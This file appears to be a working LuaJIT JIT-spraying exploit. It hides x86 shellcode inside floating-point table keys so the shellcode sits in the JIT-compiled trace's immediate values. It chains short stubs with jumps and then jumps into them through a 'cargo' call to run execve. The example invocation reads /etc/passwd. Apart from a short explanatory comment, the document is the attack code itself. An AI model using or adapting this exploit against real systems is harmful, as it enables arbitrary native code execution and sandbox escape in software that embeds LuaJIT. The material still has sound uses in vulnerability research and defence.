exploit.lua

--[[
	This JIT-shellcoding  technique  leverages  immediate  values in 
  assembly instructions to hide a shellcode within the JIT'ed trace.
  
  It is possible thanks for the 'Guarded Assertions' the JIT-compiler 
  emits when assembling the `HREFK` IR instruction/performing hash-key
  specialization.

  The shellcode is splitted into tiny 8 byte stubs,  with a
  `jmp` instruction between each stub to allow continuation.

  The `pewpew()` function points to a shellcode that executes
  `execve()` with your own argv[0] and argv[1].
]]--

function pewpew(t, s, a)
    t[5e-324]=0
    t[1e-323]=0
    t[1.5e-323]=0
    t[2e-323]=0
    t[2.5e-323]=0
    t[3e-323]=0
    t[1.9055771651032652e-193]=0
    t[1.8559668824708362e-193]=0
    t[1.8494619877878633e-193]=0
    t[1.8517288554178477e-193]=0
    t[1.914498447205438e-193]=0
    t[1.8639327969763123e-193]=0
    t[1.8538274887895865e-193]=0
    t[1.8516839145637716e-193]=0
    t[1.8567088159676176e-193]=0
    t[1.8538243533811626e-193]=0
    t[1.849450512851345e-193]=0
    t[1.8716972807551464e-193]=0
    t[1.872875119460234e-193]=0
    t[1.8745776759605808e-193]=0
    t[1.8493391391782406e-193]=0
    t[1.8506931797233557e-193]=0
  end
  local tbl={}
  pewpew(tbl,nil, nil)
  pewpew(tbl,nil, nil)
  cargo(pewpew,0xb4)
  pewpew(tbl, '/bin/cat', '/etc/passwd')